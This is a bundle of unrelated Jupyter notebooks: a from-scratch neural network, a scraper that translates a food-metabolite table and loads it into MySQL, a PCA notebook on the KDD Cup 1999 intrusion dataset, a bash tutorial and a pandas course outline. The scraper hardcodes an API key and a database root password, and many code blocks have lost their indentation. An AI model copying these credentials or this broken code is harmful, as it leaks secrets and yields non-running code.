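Y = np.multiply(labels, np.ones((3, labels.shape[1])))
# ...then turn row i into the indicator "is this example's class == i"
for i in range(Y.shape[0]):
    Y[i] = [(i == val) for val in Y[i]]
# each column is now the one-hot encoding of the original label
```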
# + id="-UA8k7q37Knu"
def model(X, Y, layer_dims, learning_rate=0.001, num_iters=3000, print_cost=False):
np.random.seed(0)
costs = []
params = init_params(layer_dims)
for i in range(0, num_iters):
A_L, cache_accumulate = forward_prop(X, params)
cost = compute_cost(A_L, Y)
grads = backward_prop(A_L, Y, cache_accumulate)
params = update_params(params, grads, learning_rate)
        if print_cost and (i % 10 == 0 or i == num_iters - 1):
            print("Cost after iteration {}: {}".format(i, np.squeeze(cost)))
if i % 100 == 0 or i == num_iters - 1:
costs.append(cost)
return params, costs
# + colab={"base_uri": "https://localhost:8080/"} id="OGR8J3q58xqb" outputId="26534e3e-fe5a-4c36-cdbc-5149e73f43a8"
params, costs = model(train_images, train_labels, layer_dims, num_iters=1, print_cost=False)
# + id="lBrmY3EXqXlQ" colab={"base_uri": "https://localhost:8080/"} outputId="3b1634c0-f907-4c1e-dcf7-8ccb567605f9"
params, costs = model(train_images, train_labels, layer_dims, learning_rate=0.002, num_iters=1500, print_cost=True)
# + id="GfYdegzWdkjf"
| DenseDNNScratch.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:100% !important; }</style>"))
import pandas as pd
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
# +
from bs4 import BeautifulSoup
import requests
import lxml.html as lh
url = "http://www.knapsackfamily.com/DietNavi/result3.php"
soup = BeautifulSoup(requests.get(url).content, 'html.parser')
stuff = []
for row in soup.select('table.list1 tr'):
tds = [td.get_text(strip=True) for td in row.select('td, th')]
stuff.append(tds)
for i in range(10):
print(stuff[i])
#5 cols with first sublist being table header
# each sublist of strings
# +
import copy
print("\n\nrows of dicts")
# third and fourth elements are EN
count = 0
table_headers = stuff[0]
col_metabollites = table_headers[0]
col_eng_names = table_headers[1]
col_health_effects = table_headers[2]
col_foods = table_headers[3]
col_citations= table_headers[4]
# make a list of dicts
df_rows = []
row_dict = {}
# organize each 5-cell row into a dict keyed by column name
for i in range(1, len(stuff)):
row = stuff[i]
row_dict[col_metabollites] = row[0]
row_dict[col_eng_names] = row[1]
row_dict[col_health_effects] = row[2]
row_dict[col_foods] = row[3]
row_dict[col_citations] = row[4]
df_rows.append(copy.deepcopy(row_dict))
row_dict.clear()
# check that df_rows is a list of dicts of each row: {col name: value}
#for i in range(len(df_rows)):
for i in range(3):
print(f'{i}\n{df_rows[i]}')
# -
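The manual dict-building loop above can also be written as a one-liner with `dict(zip(...))`; a sketch on a stand-in table (the real `stuff` comes from the scrape, and these header and cell values are made up for illustration):

```python
# stand-in for the scraped table: header row followed by data rows
stuff = [
    ['代謝物', 'Name (EN)', 'Health effect', 'Foods', 'Citations'],
    ['Quercetin', 'quercetin', 'antioxidant', 'onion', '1'],
    ['Catechin', 'catechin', 'antioxidant', 'tea', '2'],
]
# pair each header with the matching cell of every data row
df_rows = [dict(zip(stuff[0], row)) for row in stuff[1:]]
```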
metabollites_df = pd.DataFrame(df_rows)
print(metabollites_df.head())
print(metabollites_df.columns)
# write to csv
filename = 'knapsack_metabollites.csv'
metabollites_df.to_csv(filename)
# # Translate to English and upload to Mysql
import pandas as pd
import requests
#read csv to dataframe
metabollites_df = pd.read_csv('knapsack_metabollites.csv')
del metabollites_df['Unnamed: 0']
#print(metabollites_df.head())
print(metabollites_df[:3]['含まれる食品'])
print(metabollites_df.head())
print(f'columns: {metabollites_df.columns}')
table_cols = ['metabollite', 'enName', 'healthEffect', 'foods', 'citations']
#direct to myMemory
myEmail = '<EMAIL>'
myMemoryKey = 'e6a399ee8db646c17484'
ja_text = '強くする'
langpair = 'ja|en'
#params = dict(key=myMemoryKey, text=ja_text, langpair=langpair )
url = f'https://api.mymemory.translated.net/get?q={ja_text}&langpair={langpair}&key={myMemoryKey}&de={myEmail}'
from tqdm import tqdm
copy_metabollites_df = metabollites_df.copy()
cols = metabollites_df.columns.tolist()
for i in tqdm(range(len(metabollites_df.index))):
for col in cols[:-1]:
ja_cell_val = metabollites_df[col][i]
        if pd.notna(ja_cell_val):
#en_transl = getTranslate(ja_cell_val, src='ja', dest='en')
            url = f'https://api.mymemory.translated.net/get?q={ja_cell_val}&langpair={langpair}&key={myMemoryKey}&de={myEmail}'
res = requests.get(url)
json = res.json()
en_text = json['responseData']['translatedText']
#en_text = en_transl.texy
#print(en_text[:5])
            copy_metabollites_df.loc[i, col] = en_text
        else:
            copy_metabollites_df.loc[i, col] = ja_cell_val
copy_metabollites_df
#save en version to csv
filename ='en_knapsack_metabollites.csv'
copy_metabollites_df.to_csv(filename)
metabollites_df = pd.read_csv('en_knapsack_metabollites.csv')
del metabollites_df['Unnamed: 0']
metabollites_df.columns = table_cols
print(metabollites_df.columns, metabollites_df.head())
# +
from sqlalchemy import create_engine
engine = create_engine("mysql+pymysql://root:tennis33@localhost/bioactiveKnapsack?charset=utf8mb4")
# +
#rename columns
#del metabollites_df['Unnamed: 0']
print(metabollites_df.columns)
metabollites_df.columns = table_cols
print(metabollites_df.columns)
# -
metabollites_df.to_sql('metabollites', con=engine, if_exists='append', chunksize=1000, index=False)
| 1_foodsByNutrients/knapsackMetabollitesDietNavi.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
from sklearn import *
import matplotlib.pyplot as plt
from mlxtend.plotting import plot_decision_regions
# %matplotlib inline
# -
df = pd.read_csv("/data/kddcup.data", header=None)
df.head()
# +
columns = [f.split(":")[0] for f in """
duration: continuous.
protocol_type: symbolic.
service: symbolic.
flag: symbolic.
src_bytes: continuous.
dst_bytes: continuous.
land: symbolic.
wrong_fragment: continuous.
urgent: continuous.
hot: continuous.
num_failed_logins: continuous.
logged_in: symbolic.
num_compromised: continuous.
root_shell: continuous.
su_attempted: continuous.
num_root: continuous.
num_file_creations: continuous.
num_shells: continuous.
num_access_files: continuous.
num_outbound_cmds: continuous.
is_host_login: symbolic.
is_guest_login: symbolic.
count: continuous.
srv_count: continuous.
serror_rate: continuous.
srv_serror_rate: continuous.
rerror_rate: continuous.
srv_rerror_rate: continuous.
same_srv_rate: continuous.
diff_srv_rate: continuous.
srv_diff_host_rate: continuous.
dst_host_count: continuous.
dst_host_srv_count: continuous.
dst_host_same_srv_rate: continuous.
dst_host_diff_srv_rate: continuous.
dst_host_same_src_port_rate: continuous.
dst_host_srv_diff_host_rate: continuous.
dst_host_serror_rate: continuous.
dst_host_srv_serror_rate: continuous.
dst_host_rerror_rate: continuous.
dst_host_srv_rerror_rate: continuous.
""".split("\n") if len(f)>0]
columns.append("Category")
print(columns)
# -
df.columns = columns
df.info()
X = df.select_dtypes(include=[np.float64, np.int64]).values
y = df.Category
y.value_counts()
# +
# %%time
y = np.where(df.Category == "normal.", 0, 1)
X = df.select_dtypes(include=[np.float64, np.int64]).values
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y,
test_size = 0.3, random_state = 12345)
scaler = preprocessing.StandardScaler()
X_train_std = scaler.fit_transform(X_train)
X_test_std = scaler.transform(X_test)
print("X_train", X_train.shape, "X_test", X_test.shape)
# -
pd.Series(y_train).value_counts()/len(y_train)
# %%time
pca = decomposition.PCA(random_state=1)
pca.fit(X_train_std)
fig, ax = plt.subplots()
ax.bar(range(X_train_std.shape[1]), pca.explained_variance_ratio_)
ax.plot(range(X_train_std.shape[1]), np.cumsum(pca.explained_variance_ratio_))
plt.xlabel("PC components")
plt.ylabel("Variance retention")
pd.DataFrame({"retention": np.cumsum(pca.explained_variance_ratio_)})\
.query("retention>0.99")[:3]
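Instead of reading the component count off the cumulative curve, scikit-learn can pick it for you: passing a float in (0, 1) as `n_components` keeps just enough components to retain that fraction of variance. A sketch on synthetic data (the arrays here are made up; on the KDD data this would reproduce the choice of 23 components above):

```python
import numpy as np
from sklearn import decomposition

rng = np.random.RandomState(1)
X_demo = rng.normal(size=(200, 10))

# a float n_components means "keep this fraction of explained variance"
pca_auto = decomposition.PCA(n_components=0.99, random_state=1)
X_demo_red = pca_auto.fit_transform(X_demo)
# pca_auto.n_components_ is the smallest count reaching 99% retained variance
```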
# %%time
pca = decomposition.PCA(random_state=1, n_components=23)
X_train_pca = pca.fit_transform(X_train_std)
X_test_pca = pca.transform(X_test_std)
X_train_pca.shape, X_test_pca.shape, y_train.shape, y_test.shape
# %%time
est = linear_model.LogisticRegression()
est.fit(X_train_std, y_train)
print("Training accuracy:", est.score(X_train_std, y_train),
"Test accuracy:", est.score(X_test_std, y_test))
# %%time
est = linear_model.LogisticRegression()
est.fit(X_train_pca, y_train)
print("Training accuracy:", est.score(X_train_pca, y_train),
"Test accuracy:", est.score(X_test_pca, y_test))
| Scikit - PCA (kdd cup 1999).ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Terminal
#
# We are working in the **Jupyter notebook** development environment, which is running on a machine with a **Linux** (Ubuntu) operating system.
# This environment is intended for writing code in the **Python** programming language.
# ## Creating your own notebook
#
# open this link in a new tab or a new window: http://172.16.58.3:9999/
#
# then create your own file by clicking the **New** > **Python 3** button
# 
#
# it will then open; at the top, click the **Untitled** label and rename it with your own name, like here:
#
# 
# ## How do I work in it?
#
# type a command and press **shift+Enter** to run it
2+2 # This is Python; like almost any programming language, it can do arithmetic
# Above we entered a **python** command, and in Out we see the result of its execution.
# But we will get to **python** later. Right now we need the **terminal** and **bash**.
# **bash** is the thing that controls the computer through its commands. It is a command interpreter.
#
# **sh** stands for shell.
#
# You could say that **bash** is the same as **sh**, only newer and more advanced, with greater capabilities.
# ### Terminal commands
# To run terminal commands in **jupyter**, prefix them with ! (an exclamation mark)
# !pwd
# **pwd** - *print working directory*. That is, it prints the current folder we are in
#
# the output was:
#
# **/home/test/jupyter/Материалы**
# !ls
# The contents of the current folder
# !ls --help
# We asked for help on this command, so we can read how to use it
# !man ls
# almost the same kind of help. man stands for manual
# !mkdir new_dir
# !ls
# created a new folder and confirmed that it appeared
# !touch new_dir/new_file
# !ls new_dir
# created a new file (new_file) in the new_dir folder and confirmed that it appeared there
# !ls -l
# !ls -l new_dir
# listed the folders' contents with the -l flag, which prints them in long-list format
# !ls -la
# with the -a flag we also see hidden files
# ## Writing a bash script
# first, let's learn how to write to a file and read a file
# !cat new_dir/new_file
# The file is empty because we only just created it
# !echo "#!/bin/bash" > new_dir/new_file
# With this command we wrote the line #!/bin/bash into the file
# !cat new_dir/new_file
# reading it back confirms it
# !echo "ls" > new_dir/new_file
# !cat new_dir/new_file
# by using the command again, we overwrote the file's contents
# !echo "#!/bin/bash" > new_dir/new_file
# restored it to how it was
# !echo "ls" >> new_dir/new_file
# !cat new_dir/new_file
# we managed to append to the end
# !./new_dir/new_file
# the **new_file** file can already be considered a **bash script** which, when run, prints the folder's contents
# to run it, prepend **./** (dot slash)
# we tried, but the response is **/bin/bash: ./new_dir/new_file: Permission denied**
#
# That is, we do not have permission
#
# !ls -la new_dir
# next to our file we see this
#
# -rw-rw-r--
#
# This means that the file's owner is allowed rw (read, write), the file's group is allowed rw, and everyone else only r (read).
#
# In other words, this file may be read and modified, but may NOT yet be EXECUTED.
#
# Let's grant permission:
# !chmod +x new_dir/new_file
# !ls -la new_dir
# now we have x, permission to execute
# !./new_dir/new_file
# now our script runs
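The same permission check and change can also be done from Python itself, using only the standard library (a sketch; the file name here is illustrative):

```python
import os
import stat

path = "demo_script_perm"
open(path, "w").close()                      # create an empty file

mode = os.stat(path).st_mode
before = stat.filemode(mode)                 # e.g. '-rw-r--r--' (depends on umask)

os.chmod(path, mode | stat.S_IXUSR)          # the chmod +x equivalent for the owner
after = stat.filemode(os.stat(path).st_mode)

os.remove(path)                              # clean up
```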
# You can also write to a file with another command, **printf**, in multiline mode:
# + language="bash"
#
# printf "
# touch new_file_2
# ls -la
# " >> new_dir/new_file
# -
# As you can see above, you can put **%%bash** at the start of a cell instead of the exclamation mark. This tells Jupyter that the entire contents of the cell are bash commands
# !cat new_dir/new_file
# To write the whole script, it is better to use the **nano** command. It is a text editor.
#
# in the terminal we type
#
# nano script.sh
# !ls -la
# !cat script.sh
# !./script.sh
# !ls -la
# !cat journal.txt
# !./script.sh
# !cat journal.txt
# !./script.sh
# !./script.sh
# !./script.sh
# !cat journal.txt
| Terminal.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] id="W4bTJkJED0-t" colab_type="text"
# # <font color=green> PYTHON FOR DATA SCIENCE - PANDAS
# ---
# + [markdown] id="GOEcCc62D0-x" colab_type="text"
# # <font color=green> 1. INTRODUCTION TO PYTHON
# ---
# + [markdown] id="oGvoOJ-XD0-y" colab_type="text"
# # 1.1 Introduction
# + [markdown] id="fam3BM0aD0-z" colab_type="text"
# > Python is a high-level programming language with support for multiple programming paradigms. It is an *open source* project and, since its creation in 1991, it has become one of the most popular interpreted programming languages.
# >
# > In recent years Python has developed an active scientific computing and data analysis community and has been standing out as one of the most relevant languages for data science and machine learning, both in academia and in industry.
# + [markdown] id="6kH5DY-vD0-1" colab_type="text"
# # 1.2 Installation and development environment
# + [markdown] id="BTpm79I2D0-2" colab_type="text"
# ### Local installation
#
# ### https://www.python.org/downloads/
# ### or
# ### https://www.anaconda.com/distribution/
# + [markdown] id="AuPS_XwRD0-3" colab_type="text"
# ### Google Colaboratory
#
# ### https://colab.research.google.com
# + [markdown] id="4rUYsPrXD0-4" colab_type="text"
# ### Checking the version
# + id="PgTCVRB2D0-5" colab_type="code" colab={}
# + [markdown] id="lTtI6so4D0-9" colab_type="text"
# # 1.3 Working with data
# + id="E_n4FUUWD0-9" colab_type="code" colab={}
# + id="Kq-JdRHFD0-_" colab_type="code" colab={}
# + id="mOV1rCA6D0_A" colab_type="code" colab={}
# + id="5D739PzJD0_B" colab_type="code" colab={}
# + id="r_qUf16LD0_D" colab_type="code" colab={}
# + id="0R-_7PH5D0_E" colab_type="code" colab={}
# + [markdown] id="htjoBLwiD0_F" colab_type="text"
# # <font color=green> 2. WORKING WITH TUPLES
# ---
# + [markdown] id="MZH5_QnYD0_G" colab_type="text"
# # 2.1 Creating tuples
#
# Tuples are immutable sequences used to store collections of items, usually heterogeneous. They can be constructed in several ways:
# ```
# - Using a pair of parentheses: ( )
# - Using a trailing comma: x,
# - Using a pair of parentheses with comma-separated items: ( x, y, z )
# - Using: tuple() or tuple(iterator)
# ```
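The four construction forms listed above, in a minimal sketch:

```python
t1 = ()                                       # pair of parentheses
t2 = 'Passat',                                # trailing comma
t3 = ('Jetta Variant', 'Passat', 'Crossfox')  # parentheses with items
t4 = tuple(['Jetta Variant', 'Passat'])       # tuple() on an iterable
```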
# + id="xzcs9fzeD0_G" colab_type="code" colab={}
# + id="qJq7a2qTD0_I" colab_type="code" colab={}
# + id="sg7LdvptD0_J" colab_type="code" colab={}
# + id="XSSMebXjD0_K" colab_type="code" colab={}
['Jetta Variant', 'Passat', 'Crossfox', 'DS5']
# + id="dpkdzrzRD0_M" colab_type="code" colab={}
# + [markdown] id="iKUY2DOUD0_N" colab_type="text"
# # 2.2 Selecting from tuples
# + id="hBEeAM7_D0_N" colab_type="code" colab={}
# + id="-mx_1E_tD0_P" colab_type="code" colab={}
# + id="LMhyqnFID0_Q" colab_type="code" colab={}
# + id="6btHff4BD0_T" colab_type="code" colab={}
# + id="K_Dc12xBD0_U" colab_type="code" colab={}
# + id="zvrWYkkeD0_W" colab_type="code" colab={}
nomes_carros = ('Jetta Variant', 'Passat', 'Crossfox', 'DS5', ('Fusca', 'Gol', 'C4'))
nomes_carros
# + id="Dw7tbM2ED0_Z" colab_type="code" colab={}
# + id="SAMD3BtXD0_b" colab_type="code" colab={}
# + [markdown] id="KLMxh4-0D0_c" colab_type="text"
# # 2.3 Iterating over tuples
# + id="K53elKsYD0_c" colab_type="code" colab={}
nomes_carros = ('Jetta Variant', 'Passat', 'Crossfox', 'DS5')
nomes_carros
# + id="igZhZ5zdD0_d" colab_type="code" colab={}
# + [markdown] id="AOBjxBk8D0_f" colab_type="text"
# ### Tuple unpacking
# + id="UoEFnumhD0_f" colab_type="code" colab={}
# + id="AaCLcNYTD0_g" colab_type="code" colab={}
# + id="TA71S9egD0_h" colab_type="code" colab={}
# + id="CHoJ034MD0_i" colab_type="code" colab={}
# + id="oxJrOuCSD0_j" colab_type="code" colab={}
# + id="BbR9sB4BD0_k" colab_type="code" colab={}
# + id="aZvokrjPD0_m" colab_type="code" colab={}
# + id="wZXDbVg0D0_o" colab_type="code" colab={}
# + id="aWgDMBXiD0_p" colab_type="code" colab={}
# + id="OdpgNh-ND0_q" colab_type="code" colab={}
# + id="upVYFnMdD0_r" colab_type="code" colab={}
# + [markdown] id="u85Aou8WD0_s" colab_type="text"
# ## *zip()*
#
# https://docs.python.org/3.6/library/functions.html#zip
# + id="PaC2oXGED0_t" colab_type="code" colab={}
carros = ['Jetta Variant', 'Passat', 'Crossfox', 'DS5']
carros
# + id="_02O1VnHD0_u" colab_type="code" colab={}
valores = [88078.64, 106161.94, 72832.16, 124549.07]
valores
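A sketch of what *zip()* produces from the two lists above:

```python
carros = ['Jetta Variant', 'Passat', 'Crossfox', 'DS5']
valores = [88078.64, 106161.94, 72832.16, 124549.07]

# zip pairs up elements position by position; list() materializes the iterator
pares = list(zip(carros, valores))
```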
# + id="roQK5nYRD0_v" colab_type="code" colab={}
# + id="_WRxIRHrD0_w" colab_type="code" colab={}
# + id="2zIuhIILD0_x" colab_type="code" colab={}
# + id="ZJaL62IpD0_y" colab_type="code" colab={}
# + [markdown] id="xo76nR8rD0_0" colab_type="text"
# # <font color=green> 3. WORKING WITH DICTIONARIES
# ---
# + [markdown] id="wfWzOuztD0_0" colab_type="text"
# # 3.1 Creating dictionaries
#
# Lists are sequential collections, that is, their items are ordered and use indexes (integers) to access values.
#
# Dictionaries are slightly different collections. They are data structures that represent a kind of mapping. Mappings are collections of associations between pairs of values where the first element of the pair is known as the key and the second as the value.
#
# ```
# dicionario = {key_1: value_1, key_2: value_2, ..., key_n: value_n}
# ```
#
# https://docs.python.org/3.6/library/stdtypes.html#typesmapping
# + id="SuPcV9v6D0_0" colab_type="code" colab={}
# + id="YIFVkWT6D0_1" colab_type="code" colab={}
carros = ['Jetta Variant', 'Passat', 'Crossfox']
carros
# + id="2LHiBn3-D0_2" colab_type="code" colab={}
valores = [88078.64, 106161.94, 72832.16]
valores
# + id="YxLAx_sqD0_4" colab_type="code" colab={}
# + id="WITNWExID0_7" colab_type="code" colab={}
# + id="bHNqoDbTD0_8" colab_type="code" colab={}
# + id="4FyQgmcAD0_9" colab_type="code" colab={}
# + [markdown] id="PQg-MLkGD0_-" colab_type="text"
# ### Creating dictionaries with *zip()*
# + id="iB4Q_gbND0__" colab_type="code" colab={}
# + id="mIgZqdKKD1AA" colab_type="code" colab={}
# + [markdown] id="KYeRqavFD1AD" colab_type="text"
# # 3.2 Dictionary operations
# + [markdown] id="KzmWbEltD1AD" colab_type="text"
# ## *dict[ key ]*
#
# Returns the value corresponding to the key in the dictionary.
# + id="hFFDz6wKD1AD" colab_type="code" colab={}
# + [markdown] id="SWlE6VTBD1AE" colab_type="text"
# ## *key in dict*
#
# Returns **True** if the key is found in the dictionary.
# + id="Iy88SxBtD1AE" colab_type="code" colab={}
# + id="Oma56NkAD1AF" colab_type="code" colab={}
# + id="yS2U-_8gD1AG" colab_type="code" colab={}
# + [markdown] id="oWbWyDd0D1AI" colab_type="text"
# ## *len(dict)*
#
# Returns the number of items in the dictionary.
# + id="k08YkCc1D1AJ" colab_type="code" colab={}
# + [markdown] id="yYNqIHJBD1AK" colab_type="text"
# ## *dict[ key ] = value*
#
# Adds an item to the dictionary.
# + id="5jj3i52bD1AK" colab_type="code" colab={}
# + id="y6rso5hLD1AL" colab_type="code" colab={}
# + [markdown] id="_z0JySuqD1AL" colab_type="text"
# ## *del dict[ key ]*
#
# Removes the item with the given key from the dictionary.
# + id="PPfh6sfID1AM" colab_type="code" colab={}
# + id="BtjGpXtGD1AN" colab_type="code" colab={}
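The operations from this section (`dict[key]`, `in`, `len`, adding, `del`) in one minimal sketch:

```python
dados = {'Passat': 106161.94, 'Crossfox': 72832.16}

valor_passat = dados['Passat']        # access by key
tem_passat = 'Passat' in dados        # membership test
n = len(dados)                        # number of items
dados['DS5'] = 124549.07              # add an item
del dados['Crossfox']                 # remove an item
```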
# + [markdown] id="FodJVx5sD1AP" colab_type="text"
# # 3.3 Dictionary methods
# + [markdown] id="7pqdPOkYD1AP" colab_type="text"
# ## *dict.update()*
#
# Updates the dictionary.
# + id="DUySYxKQD1AQ" colab_type="code" colab={}
# + id="DLsqp71cD1AR" colab_type="code" colab={}
# + [markdown] id="JLs5c0DeD1AR" colab_type="text"
# ## *dict.copy()*
#
# Creates a copy of the dictionary.
# + id="X9F7OB3eD1AS" colab_type="code" colab={}
# + id="v0rL0bveD1AS" colab_type="code" colab={}
# + id="M-abRGGrD1AT" colab_type="code" colab={}
# + id="ETBD0TkND1AU" colab_type="code" colab={}
# + [markdown] id="mNODkmHCD1AV" colab_type="text"
# ## *dict.pop(key[, default ])*
#
# If the key is found in the dictionary, the item is removed and its value is returned. Otherwise, the value given as *default* is returned. If no *default* value is provided and the key is not found in the dictionary, an error is raised.
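A sketch of the three *pop()* behaviors described above:

```python
dados = {'Passat': 106161.94, 'Crossfox': 72832.16}

v1 = dados.pop('Passat')                  # key found: removed and returned
v2 = dados.pop('Fusca', 'not found')      # key missing with default: default returned
try:
    dados.pop('Fusca')                    # key missing, no default: KeyError
except KeyError:
    v3 = 'KeyError raised'
```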
# + id="_4QEPwScD1AW" colab_type="code" colab={}
# + id="Hjh0MuymD1AX" colab_type="code" colab={}
# + id="f51rKjkuD1AX" colab_type="code" colab={}
# + id="Ah4sZ7axD1AZ" colab_type="code" colab={}
# + id="SJATRY8RD1Aa" colab_type="code" colab={}
# + id="V36wHdzmD1Ab" colab_type="code" colab={}
# + id="LJ0lQIrdD1Ac" colab_type="code" colab={}
# + id="yKGu-fYkD1Ad" colab_type="code" colab={}
# + id="x-h8nVyhD1Af" colab_type="code" colab={}
# + [markdown] id="Q5J0R7d3D1Ag" colab_type="text"
# ## *dict.clear()*
#
# Removes all items from the dictionary.
# + id="AvkP_8mND1Ag" colab_type="code" colab={}
# + id="S69pMYboD1Ah" colab_type="code" colab={}
# + [markdown] id="QhoSRfPsD1Ai" colab_type="text"
# # 3.4 Iterating over dictionaries
# + [markdown] id="E-agaqakD1Ai" colab_type="text"
# ## *dict.keys()*
#
# Returns a list containing the dictionary's keys.
# + id="qFADEYmBD1Aj" colab_type="code" colab={}
# + id="niwh9AgDD1Aj" colab_type="code" colab={}
# + [markdown] id="qFj6Cc7dD1Ak" colab_type="text"
# ## *dict.values()*
#
# Returns a list with all of the dictionary's values.
# + id="nfpLxrQVD1Al" colab_type="code" colab={}
# + [markdown] id="-NGRwX0AD1Al" colab_type="text"
# ## *dict.items()*
#
# Returns a list containing one tuple for each key-value pair in the dictionary.
# + id="Q2I9_6YvD1Am" colab_type="code" colab={}
# + id="0j41ZqgQD1Am" colab_type="code" colab={}
# + id="OVY9rIwFD1An" colab_type="code" colab={}
# + id="ma2Ol8vcD1Ap" colab_type="code" colab={}
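Iterating over keys, values, and key-value pairs, in a minimal sketch:

```python
dados = {'Passat': 106161.94, 'Crossfox': 72832.16}

chaves = list(dados.keys())
valores = list(dados.values())
itens = list(dados.items())       # list of (key, value) tuples
```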
# + [markdown] id="-q3AlSg3D1Aq" colab_type="text"
# # <font color=green> 4. FUNCTIONS AND PACKAGES
# ---
#
# Functions are reusable units of code that perform a specific task; they can receive input and can also return a result.
# + [markdown] id="5CfEcU58D1Aq" colab_type="text"
# # 4.1 Built-in functions
#
# The Python language has several built-in functions that are always accessible. We have already used some of them in this course: type(), print(), zip(), len(), set(), etc.
#
# https://docs.python.org/3.6/library/functions.html
# + id="DP7cmY7xD1Aq" colab_type="code" colab={}
dados = {'Jetta Variant': 88078.64, 'Passat': 106161.94, 'Crossfox': 72832.16}
dados
# + id="5zAcGSCbD1Ar" colab_type="code" colab={}
# + id="zG9_jU_1D1At" colab_type="code" colab={}
# + id="jn0O3uXZD1Au" colab_type="code" colab={}
# + id="lnUjKVnoD1Aw" colab_type="code" colab={}
# + id="WdEuYXe2D1Ay" colab_type="code" colab={}
# + id="hIA29O3tD1Az" colab_type="code" colab={}
# + [markdown] id="6w62Sl5ZD1A0" colab_type="text"
# # 4.2 Defining functions without and with parameters
# + [markdown] id="OADZiBP2D1A0" colab_type="text"
# ### Functions without parameters
#
# #### Standard form
#
# ```
# def <name>():
#     <instructions>
# ```
# + id="uCkplEpQD1A0" colab_type="code" colab={}
# + id="fOCEGq5VD1A1" colab_type="code" colab={}
# + [markdown] id="PwSlYSVAD1A2" colab_type="text"
# ### Functions with parameters
#
# #### Standard form
#
# ```
# def <name>(<param_1>, <param_2>, ..., <param_n>):
#     <instructions>
# ```
# + id="A3YnBUduD1A3" colab_type="code" colab={}
# + id="rGUZbRERD1A3" colab_type="code" colab={}
# + id="B9WDlRE7D1A5" colab_type="code" colab={}
# + id="1HAy8OK_D1A6" colab_type="code" colab={}
# + id="_CDa4oOfD1A6" colab_type="code" colab={}
# + id="xH-mxqYAD1A8" colab_type="code" colab={}
# + id="WXXC_UidD1A8" colab_type="code" colab={}
# + [markdown] id="8zNYrmFbD1A9" colab_type="text"
# # 4.3 Defining functions that return values
# + [markdown] id="J44K-dMOD1A9" colab_type="text"
# ### Functions that return a single value
#
# #### Standard form
#
# ```
# def <name>(<param_1>, <param_2>, ..., <param_n>):
#     <instructions>
#     return <result>
# ```
# + id="-UG42RQJD1A9" colab_type="code" colab={}
# + id="VJwdvoT5D1A-" colab_type="code" colab={}
# + id="AgAeJkpND1A-" colab_type="code" colab={}
# + id="_r616TevD1A_" colab_type="code" colab={}
# + [markdown] id="MQaK8GV5D1BA" colab_type="text"
# ### Functions that return more than one value
#
# #### Standard form
#
# ```
# def <name>(<param_1>, <param_2>, ..., <param_n>):
#     <instructions>
#     return (<result_1>, <result_2>, ..., <result_n>)
# ```
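A sketch of both return styles, using this notebook's car-price theme (the function names here are illustrative):

```python
def media(valores):
    # single result
    return sum(valores) / len(valores)

def minimo_maximo(valores):
    # multiple results come back as a tuple and can be unpacked
    return (min(valores), max(valores))

m = media([10, 20, 30])
menor, maior = minimo_maximo([10, 20, 30])
```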
# + id="v0PUMegVD1BA" colab_type="code" colab={}
# + id="Ys-etom8D1BA" colab_type="code" colab={}
# + id="LERrvkMHD1BC" colab_type="code" colab={}
# + id="sqoFOWSsD1BC" colab_type="code" colab={}
# + id="NdB_Jyw_D1BD" colab_type="code" colab={}
# + [markdown] id="uQ5lNnKrD1BD" colab_type="text"
# # <font color=green> 5. PANDAS BASICS
# ---
#
# **version: 0.25.2**
#
# Pandas is a high-level data manipulation tool built on top of the Numpy package. The pandas package provides very convenient data structures for data manipulation and is therefore widely used by data scientists.
#
#
# ## Data Structures
#
# ### Series
#
# Series are one-dimensional labeled arrays capable of holding any data type. The row labels are called the **index**. The basic way to create a Series is the following:
#
#
# ```
# s = pd.Series(dados, index = index)
# ```
#
# The *dados* argument can be a dictionary, a list, a Numpy array, or a constant.
#
# ### DataFrames
#
# A DataFrame is a two-dimensional tabular data structure with labeled rows and columns. Like Series, DataFrames can hold any type of data.
#
#
# ```
# df = pd.DataFrame(dados, index = index, columns = columns)
# ```
#
# The *dados* argument can be a dictionary, a list, a Numpy array, a Series, or another DataFrame.
#
# **Documentation:** https://pandas.pydata.org/pandas-docs/version/0.25/
# + [markdown] id="2qa7RC03D1BD" colab_type="text"
# # 5.1 Data structures
# + id="4QyFDeS4D1BD" colab_type="code" colab={}
# + [markdown] id="kIey8_OcD1BF" colab_type="text"
# ### Creating a Series from a list
# + id="yEZR6DWiD1BF" colab_type="code" colab={}
# + id="rLudWKZ_D1BF" colab_type="code" colab={}
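# One possible sketch (the car names are taken from the data used later in this notebook); when no index is passed, pandas assigns a default integer index:

```python
import pandas as pd

# A Series built from a plain Python list; the index defaults to 0..n-1
cars = ['Jetta Variant', 'Passat', 'Crossfox']
s = pd.Series(cars)
print(s)
```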
# + [markdown] id="VYVIKd1-D1BG" colab_type="text"
# ### Creating a DataFrame from a list of dictionaries
# + id="QFNS9PckD1BG" colab_type="code" colab={}
dados = [
{'Nome': 'Jetta Variant', 'Motor': 'Motor 4.0 Turbo', 'Ano': 2003, 'Quilometragem': 44410.0, 'Zero_km': False, 'Valor': 88078.64},
{'Nome': 'Passat', 'Motor': 'Motor Diesel', 'Ano': 1991, 'Quilometragem': 5712.0, 'Zero_km': False, 'Valor': 106161.94},
{'Nome': 'Crossfox', 'Motor': 'Motor Diesel V8', 'Ano': 1990, 'Quilometragem': 37123.0, 'Zero_km': False, 'Valor': 72832.16}
]
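# As a sketch, a shortened, illustrative version of the list above can be passed straight to the `DataFrame` constructor:

```python
import pandas as pd

# Each dictionary becomes one row; keys become column names
data = [
    {'Nome': 'Jetta Variant', 'Ano': 2003, 'Valor': 88078.64},
    {'Nome': 'Passat', 'Ano': 1991, 'Valor': 106161.94},
]
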